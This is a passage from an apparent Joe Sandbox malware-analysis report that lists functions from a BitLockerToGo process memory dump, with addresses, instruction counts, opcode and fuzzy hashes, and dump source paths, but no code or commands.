                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 309764462c4cd0fce9cbb57e5d38dd8438674b18f1a156f257a50cdc64c35a49
                                                                                                                  • Instruction ID: 4c22972e767005ef780dc377656139b20cc2688e250ac7ae1745f98d62cf4db0
                                                                                                                  • Opcode Fuzzy Hash: 309764462c4cd0fce9cbb57e5d38dd8438674b18f1a156f257a50cdc64c35a49
                                                                                                                  • Instruction Fuzzy Hash: 6FF12A75604B408FD324DF38C8513AABBE2AF9A314F19896ED4EB873C2D639E445CB51
                                                                                                                  Function 004096BA Relevance: .4, Instructions: 368COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 297752c22041bee15e1be13419c0ddbd475325b22d7a449d4260b09e1241d27c
                                                                                                                  • Instruction ID: 5159a6f45efd51e97f9577d37ae06cfb5c81669c95a018dc56caf7522d1e4961
                                                                                                                  • Opcode Fuzzy Hash: 297752c22041bee15e1be13419c0ddbd475325b22d7a449d4260b09e1241d27c
                                                                                                                  • Instruction Fuzzy Hash: F8F12575200B01DFD7258F19C940A56BBF2BF49300F098A6DE98A87BA1C736F865DB90
                                                                                                                  Function 0042DDA0 Relevance: .3, Instructions: 307COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 843de8b1d378d61f8558faffc671f0148a777d374d070cb76ec6cbb8a60927a8
                                                                                                                  • Instruction ID: 8fcf851fb41c9eeb9f2e9717f2e2afb47014a38318de1e7f7dd684663e551520
                                                                                                                  • Opcode Fuzzy Hash: 843de8b1d378d61f8558faffc671f0148a777d374d070cb76ec6cbb8a60927a8
                                                                                                                  • Instruction Fuzzy Hash: 839104B1E002649FDB14DF68C84169EBBB1FB45314F59816DD851AF386DB34D802CBE1
                                                                                                                  Function 0040AB80 Relevance: .3, Instructions: 303COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4a80ca62d505dc76647621b39b4d64367716d1139b3f2d8800d4ad244fa74cce
                                                                                                                  • Instruction ID: 9d85a5dc1860133ed8ab3b612415493fcffdddbb1ed18381edd87997ba8a7203
                                                                                                                  • Opcode Fuzzy Hash: 4a80ca62d505dc76647621b39b4d64367716d1139b3f2d8800d4ad244fa74cce
                                                                                                                  • Instruction Fuzzy Hash: 2CC15CB2A487418FC360CF68DC86BABB7E1BF85318F08492DD1D9D6342E778A155CB46
                                                                                                                  Function 00446030 Relevance: .3, Instructions: 267COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 2b6b2c7895784e11f17349c6fc0cfb2845c222c87297fe70abe7ca31e0a0b8d9
                                                                                                                  • Instruction ID: 968875f53b84ac173d19eadfc197ad68e8b3fa8fd6c44165642480cd6d901932
                                                                                                                  • Opcode Fuzzy Hash: 2b6b2c7895784e11f17349c6fc0cfb2845c222c87297fe70abe7ca31e0a0b8d9
                                                                                                                  • Instruction Fuzzy Hash: 417125317043019BE714DF28C890A6FB3A2FFDA750F1A852EE88587361D778DC55978A
                                                                                                                  Function 004439A0 Relevance: .2, Instructions: 242COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c01642ebd65303200edd6032b6c88674e31b2c05494354804c1d7610ab74d8bc
                                                                                                                  • Instruction ID: cf61b46511511224250b8458da186a57035532e2bf6d145d5a23b6622c7a4b44
                                                                                                                  • Opcode Fuzzy Hash: c01642ebd65303200edd6032b6c88674e31b2c05494354804c1d7610ab74d8bc
                                                                                                                  • Instruction Fuzzy Hash: D471AD366493944BC7218E288CD073BFBD2ABC5326F1C83AEE4E9133D3CA25AD058655
                                                                                                                  Function 00446920 Relevance: .2, Instructions: 239COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 1e8ad391ddfaa474c671ce4ab9413db1b460bbbf09571ad89ed210ea6ca15bde
                                                                                                                  • Instruction ID: bbc09ca1651904882342521ddafa899ff76ba26f947c0a5a87ca8665f74da041
                                                                                                                  • Opcode Fuzzy Hash: 1e8ad391ddfaa474c671ce4ab9413db1b460bbbf09571ad89ed210ea6ca15bde
                                                                                                                  • Instruction Fuzzy Hash: 3C611771B083109FE7149E24D891A6BB7A2EBD6310F1AC53DE885A73A1D674DC05C787
                                                                                                                  Function 00441010 Relevance: .2, Instructions: 221COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 0e16061274ff388c99a4b072abdd374e6c740bb343a18b8358be3be69b4e247f
                                                                                                                  • Instruction ID: 18caae476c9cb67376aca77e1824e60d088588a35d20c2b4bb4d9a36597fc2bc
                                                                                                                  • Opcode Fuzzy Hash: 0e16061274ff388c99a4b072abdd374e6c740bb343a18b8358be3be69b4e247f
                                                                                                                  • Instruction Fuzzy Hash: F1713931A083419BEB15CF68C880727B7E2AF89324F19862EE594973B1D339DC81C789
                                                                                                                  Function 0041D440 Relevance: .2, Instructions: 189COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 706071bd107eb37fb6828a5d4da02d66562aacab40a5db17640b5deb1583b14b
                                                                                                                  • Instruction ID: 57f5e7a1e13f51f514adc9ea55c7c066111ebdbd3fc58cb1dbd0095a33266f20
                                                                                                                  • Opcode Fuzzy Hash: 706071bd107eb37fb6828a5d4da02d66562aacab40a5db17640b5deb1583b14b
                                                                                                                  • Instruction Fuzzy Hash: D1614CB2B54B404BD3188A78C9913977BD39BD5328F1D8A2EC5EB873D2D67C9481C705
                                                                                                                  Function 0043B5A0 Relevance: .2, Instructions: 189COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: aff2ec78a13f221ab1cdeafa2203a25c71f37109ead81e3ac60af4a39fd5cc8e
                                                                                                                  • Instruction ID: 1adc4d429c1ecf8c9941e1abcfa785f65ca123e7e8d6dd77785d81e5067e86b6
                                                                                                                  • Opcode Fuzzy Hash: aff2ec78a13f221ab1cdeafa2203a25c71f37109ead81e3ac60af4a39fd5cc8e
                                                                                                                  • Instruction Fuzzy Hash: 1C515CB15087548FE314DF69D49435BBBE1FBC8318F044A2EE5E987391E379D6088B86
                                                                                                                  Function 0040DC20 Relevance: .2, Instructions: 189COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f86405fb2007c4bbf513690a8855a111830127e87d922487c2c063cae4f72ed2
                                                                                                                  • Instruction ID: a305dd676f73fedff789fbc527c919fdfc356436a3f3cf1ee74e6b7fc03ccdce
                                                                                                                  • Opcode Fuzzy Hash: f86405fb2007c4bbf513690a8855a111830127e87d922487c2c063cae4f72ed2
                                                                                                                  • Instruction Fuzzy Hash: 18513837E0DA904BD3146EBC5C51279AA520FA2334F2E837ADDF56B3D1C12D4C0A939A
                                                                                                                  Function 0041CC89 Relevance: .2, Instructions: 187COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b04901688f76106c64a28073aa96190d6d3306a9ffe946934ec998673bdd2ef5
                                                                                                                  • Instruction ID: b2452f8a71a401c2c2037abd05d5753722c25c0f8862a7d72687f07adf20167c
                                                                                                                  • Opcode Fuzzy Hash: b04901688f76106c64a28073aa96190d6d3306a9ffe946934ec998673bdd2ef5
                                                                                                                  • Instruction Fuzzy Hash: 9D614A32654B408BD3288A78CDD27A77AD39BD5324F1D863EC5E7873D2D9789841C709
                                                                                                                  Function 00430170 Relevance: .2, Instructions: 167COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e84c5e8471833dd8903bfc6716453572c4ae7a427d7310c398446a4908ab4a10
                                                                                                                  • Instruction ID: 3a66b9335d6dbcc84703adb4645bc4faefbcfed2c257eafe649dd69867414998
                                                                                                                  • Opcode Fuzzy Hash: e84c5e8471833dd8903bfc6716453572c4ae7a427d7310c398446a4908ab4a10
                                                                                                                  • Instruction Fuzzy Hash: F141CE73F5092107876C89299C2323BA586A7D4320B1AD33EDDABDB3D8DE698D0542C8
                                                                                                                  Function 004055D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 66ff4f1896fba534801b88021873a06daaa92e35a9ee801cc655996b12d9ca27
                                                                                                                  • Instruction ID: 3619783663d70a7b68cc0fa9005bcce5286773a86b61be5b754f26e5c5c3c70e
                                                                                                                  • Opcode Fuzzy Hash: 66ff4f1896fba534801b88021873a06daaa92e35a9ee801cc655996b12d9ca27
                                                                                                                  • Instruction Fuzzy Hash: C951ACB5A042009FC714AF18C880927B7A5FF85328F158A7DE859AB392D735EC51CF9A
                                                                                                                  Function 00414B82 Relevance: .1, Instructions: 143COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6afac2923d5b50b7956077394385e8bc0dd9322f132002b4d0071a1d8872b946
                                                                                                                  • Instruction ID: d2c5b54c5af1bf39cd66004f6259f53bb9eb9f81a4f63154d321c402f0fc61f0
                                                                                                                  • Opcode Fuzzy Hash: 6afac2923d5b50b7956077394385e8bc0dd9322f132002b4d0071a1d8872b946
                                                                                                                  • Instruction Fuzzy Hash: 9451D831705B808FD315CB3CC89279A7BD2AB96314F1A8A7DD5EAC77C2D63DA5018711
                                                                                                                  Function 0043CAD0 Relevance: .1, Instructions: 140COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 145f51256ba35389317405a5068007b6d0d257ef8b0c350083cb4710a3d16822
                                                                                                                  • Instruction ID: 140468567443650af876d1640f610d98e08c8f7eeff7321258eb9999995bc83e
                                                                                                                  • Opcode Fuzzy Hash: 145f51256ba35389317405a5068007b6d0d257ef8b0c350083cb4710a3d16822
                                                                                                                  • Instruction Fuzzy Hash: 91413B71A083056BD700DF15ECC1B7BB3D5AB84748F04683DF989A7252E33AEC45879A
                                                                                                                  Function 004400E0 Relevance: .1, Instructions: 132COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a71dd39cb484f1199f77af25fd17e2a8e4c5a3309abeca7a2aeacd07cba8fb45
                                                                                                                  • Instruction ID: 76bc62529342e815ec0560b03aa1ef6b175dec9f7b5410be5c9abd6549759ee3
                                                                                                                  • Opcode Fuzzy Hash: a71dd39cb484f1199f77af25fd17e2a8e4c5a3309abeca7a2aeacd07cba8fb45
                                                                                                                  • Instruction Fuzzy Hash: 694126346083008BFB218F64DC84B6BB7E6FB95714F14492ED581833A1D77AEC11CB5A
                                                                                                                  Function 00410B80 Relevance: .1, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c4605d2d0239c86237d9c008eb0a06f6b3caad431740b7d23c4b71f064b8d7a9
                                                                                                                  • Instruction ID: fa8122b2b51dffddabcbc37d9296f2e12b207cbf199d9a7e36e042cfd966f633
                                                                                                                  • Opcode Fuzzy Hash: c4605d2d0239c86237d9c008eb0a06f6b3caad431740b7d23c4b71f064b8d7a9
                                                                                                                  • Instruction Fuzzy Hash: 0241163270C2900FD318CE79889016EBBD2ABC5214F19C73EF0A587394EAB8D985E755
                                                                                                                  Function 0043BD30 Relevance: .1, Instructions: 111COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3db6810398f2c6e25d7dbb883ac9798450e2b7a30399b119a2cb8294678f434b
                                                                                                                  • Instruction ID: a8ecd84f0a375ab27eb45a194e4067cb6f06f6a41cab94bf5cbca86be3064f9f
                                                                                                                  • Opcode Fuzzy Hash: 3db6810398f2c6e25d7dbb883ac9798450e2b7a30399b119a2cb8294678f434b
                                                                                                                  • Instruction Fuzzy Hash: 04212331708215478B2CCE19D89267BF79ADBCE320F09953FDA868B2D1E778D84083E5
                                                                                                                  Function 0043FD10 Relevance: .1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8d127fdc9f5b745da3b53a35c1f3201024730a9039391a4faf1029988586b4c8
                                                                                                                  • Instruction ID: 758d2329d823db98d8a541574938e83a10420879f4ff71b35d42d77e3208c8ab
                                                                                                                  • Opcode Fuzzy Hash: 8d127fdc9f5b745da3b53a35c1f3201024730a9039391a4faf1029988586b4c8
                                                                                                                  • Instruction Fuzzy Hash: E021F3719093019FD7108F24D8987ABBBE4EB9A714F14993EE48197352C379CC4ACB96
                                                                                                                  Function 00406A00 Relevance: .1, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0c61014a5e6f122ff9f1b38bddcb439dd125aa4f105d6153f6e84efffed074c1
                                                                                                                  • Instruction ID: c63ce910312ea317fad1948ebc7f5a92f80822efa318bb59d614fba0068a1104
                                                                                                                  • Opcode Fuzzy Hash: 0c61014a5e6f122ff9f1b38bddcb439dd125aa4f105d6153f6e84efffed074c1
                                                                                                                  • Instruction Fuzzy Hash: 7E11043BB382320BE350DE3ADCC45276352EBC622070E4535EA43E3382C636E862D554
                                                                                                                  Function 00441E9B Relevance: .1, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1f3c877fa3897905c8850c77f8631051a8afe10610bc362877d4c4a2e5ddadb8
                                                                                                                  • Instruction ID: e2c26bb9121d6e211a2027aee894ce4d86db0422deb2a883d2929daa05d40d25
                                                                                                                  • Opcode Fuzzy Hash: 1f3c877fa3897905c8850c77f8631051a8afe10610bc362877d4c4a2e5ddadb8
                                                                                                                  • Instruction Fuzzy Hash: DA21F93660C3908FC304CF68A89066BBBE2ABD5354F58C97DE1D557382C674D509CB5A
                                                                                                                  Function 004396E0 Relevance: .1, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction ID: 5ad9138d0418dea6683ec412d1008d9c2aad4af8272a9ecd7e99d2946a3ce182
                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction Fuzzy Hash: 1D112933A251D04EC3168D3C8440565BFA30A97634F59539AF4F49B2D2D7268D8AC359
                                                                                                                  Function 00416B1F Relevance: .1, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e018d869073fc9f8fa43ec168156d8cc7369c88c4ef1817efe760b3be0bcdf7e
                                                                                                                  • Instruction ID: dde1e6f72a400bd6d51be8e468a33886f8ffb4e05c0bbeccc062e40f8e19d774
                                                                                                                  • Opcode Fuzzy Hash: e018d869073fc9f8fa43ec168156d8cc7369c88c4ef1817efe760b3be0bcdf7e
                                                                                                                  • Instruction Fuzzy Hash: 85210576B08B414FD318CA35D8903677AE3ABDA304F1EC47DD5AA8B782CA79A446C740
                                                                                                                  Function 0042F840 Relevance: .1, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3103a4feb325aeb26cb2b87ca0de2252ea723c0010030174cfc264ee4c6073ca
                                                                                                                  • Instruction ID: 62f4eb9a129cb2622d0713f87bd9d97538c0b8103761e445c3926292cf9809e7
                                                                                                                  • Opcode Fuzzy Hash: 3103a4feb325aeb26cb2b87ca0de2252ea723c0010030174cfc264ee4c6073ca
                                                                                                                  • Instruction Fuzzy Hash: 0B0152B5B0131187DA20AE66A5C5B27E2B89F84B08F98453ED80557342DB7AEC09869D
                                                                                                                  Function 0043FE30 Relevance: .1, Instructions: 60COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 14b63e7c5f559039a98fc87325becc06e7aa4c7c04aebbfa1a1c6ab5c7f43090
                                                                                                                  • Instruction ID: 0c548740fe21f1af25db2421896dfdc63c3e0fb8f6bddd5393b1bc29a0946f72
                                                                                                                  • Opcode Fuzzy Hash: 14b63e7c5f559039a98fc87325becc06e7aa4c7c04aebbfa1a1c6ab5c7f43090
                                                                                                                  • Instruction Fuzzy Hash: B4012470F052005BEB215E699D817677327A7DA761F29A13AE4405727BC339CC01C658
                                                                                                                  Function 0041DEB0 Relevance: .0, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2cfa0c90bb1f8422eb66bfc87f69f72b49532905a6a19ff68369fabc0f7b9bac
                                                                                                                  • Instruction ID: e89bded62bf939ca5e9c165c69203de5b046c35fe568ce43d127af32167fe11c
                                                                                                                  • Opcode Fuzzy Hash: 2cfa0c90bb1f8422eb66bfc87f69f72b49532905a6a19ff68369fabc0f7b9bac
                                                                                                                  • Instruction Fuzzy Hash: A5F027F1A0462017DB2689449CC0FB7BB9CCBA7369F090416E8419B242D265588083EA
                                                                                                                  Function 0043E530 Relevance: .0, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                  • Instruction ID: 778b8fed6b5eb646648406878ea007d4b5ddcd9983813d35cf93edf296860b99
                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                  • Instruction Fuzzy Hash: 26D05B21509221569B648D1A9400577F7E0E987711F59555FF586D3284E234DC41C56D
                                                                                                                  Function 00442E5F Relevance: .0, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
